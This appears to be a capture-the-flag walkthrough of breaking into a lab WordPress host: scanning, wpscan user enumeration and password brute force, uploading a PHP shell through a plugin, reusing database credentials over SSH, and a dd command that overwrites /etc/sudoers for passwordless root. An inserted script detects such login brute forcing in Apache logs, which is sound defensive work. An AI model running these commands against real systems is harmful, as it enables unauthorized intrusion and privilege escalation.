Scanning the host with nmap -A -T4 -p- 192.168.1.9 -vv

From nmap we can see it's a WordPress site, so let's run dirb http://192.168.1.9

Enumerating WordPress users with wpscan --url 192.168.1.9 -e u

Then brute force it with rockyou.txt
wpscan --url 192.168.1.9 -U admin -P /root/pass/rockyou.txt

Guess I should have started by just testing the obvious lol, anyway the credentials are admin:admin and we got in, now let's try to upload a shell to the target
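Seen from the blue-team side, the wpscan run above leaves a very recognisable trail in the web server's access log: a burst of POST requests to /wp-login.php from one address, each answered with a 200 (the login form re-rendered with an error), and then a 302 redirect the moment a guess succeeds. The following sh script is an added example and not part of this write-up; it builds a constructed Apache combined-format log sample (the addresses, timestamps and user agent are made up for the demo) and counts failed and successful login POSTs per source address. It keys on the request pattern rather than on the scanner's user agent, since the latter is trivial to change.

```shell
#!/bin/sh
# Added example (not from the write-up): spot a wp-login.php password-guessing
# burst in an Apache combined-format access log.
#
# In a default WordPress install a failed login POST gets a 200 (the form is
# re-rendered with an error) and a successful one gets a 302 to wp-admin, so
# a run of 200s followed by a 302 from one client is the signature to look for.

# make_sample_log: write a constructed sample log and print its path.
# Addresses, timestamps and the user agent are made up for this demo.
make_sample_log() {
    f=$(mktemp)
    {
        printf '10.0.0.5 - - [10/Mar/2021:09:55:12 +0000] "GET / HTTP/1.1" 200 9124 "-" "Mozilla/5.0"\n'
        printf '10.0.0.5 - - [10/Mar/2021:09:55:40 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"\n'
        i=1
        while [ "$i" -le 12 ]; do
            printf '192.168.1.50 - - [10/Mar/2021:10:00:%02d +0000] "POST /wp-login.php HTTP/1.1" 200 3512 "-" "WPScan (constructed UA)"\n' "$i"
            i=$((i + 1))
        done
        printf '192.168.1.50 - - [10/Mar/2021:10:00:13 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "WPScan (constructed UA)"\n'
    } > "$f"
    printf '%s\n' "$f"
}

# wp_login_bruteforce LOGFILE THRESHOLD
# Prints one line per client with at least THRESHOLD failed login POSTs:
#   <ip> failed=<n> succeeded_after=<m>
# Combined-format fields: $1 client, $6 "\"METHOD", $7 path, $9 status code.
wp_login_bruteforce() {
    awk -v thr="$2" '
        $6 == "\"POST" && $7 ~ /^\/wp-login\.php/ {
            if ($9 == 200) fail[$1]++
            else if ($9 == 302) succ[$1]++
        }
        END {
            for (ip in fail)
                if (fail[ip] >= thr)
                    printf "%s failed=%d succeeded_after=%d\n", ip, fail[ip], succ[ip] + 0
        }' "$1"
}

# Demo run: the single legitimate login from 10.0.0.5 is not reported,
# the twelve failures and one success from 192.168.1.50 are.
LOG=$(make_sample_log)
wp_login_bruteforce "$LOG" 10
rm -f "$LOG"
```

On a real server the threshold is a tuning knob (a dozen failures in a few seconds from one client is rarely a human); a `succeeded_after` greater than zero is the line that should page someone, because it means the guessing stopped for the reason you least want.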
We can install new plugins, so I installed the File Manager plugin:

Then I uploaded a shell.php file to the upload directory:

And just like that we got a shell by opening the file or viewing its info:

We got the flag from the home directory of the user ck

We can view the WordPress config file at /var/www/html/wp-config.php

I used the password bla_is_my_password to ssh to the host, trying the username bla, and it worked:

And the user bla can run sudo:

According to THIS site we can abuse it to upload an ssh key file from our machine to the target:

And as soon as I ssh'd to it we got in, and we can see the user bla1 can run sudo as well:

sudo -u ck-00 /bin/rbash

Once again according to THIS site we can abuse sudo using the dd command like this:
echo "ck-00 ALL=(ALL) NOPASSWD: ALL" | sudo dd of=/etc/sudoers
It's actually easy: all we do is write a rule for the user ck-00 into the sudoers file so that no password is asked for anything:
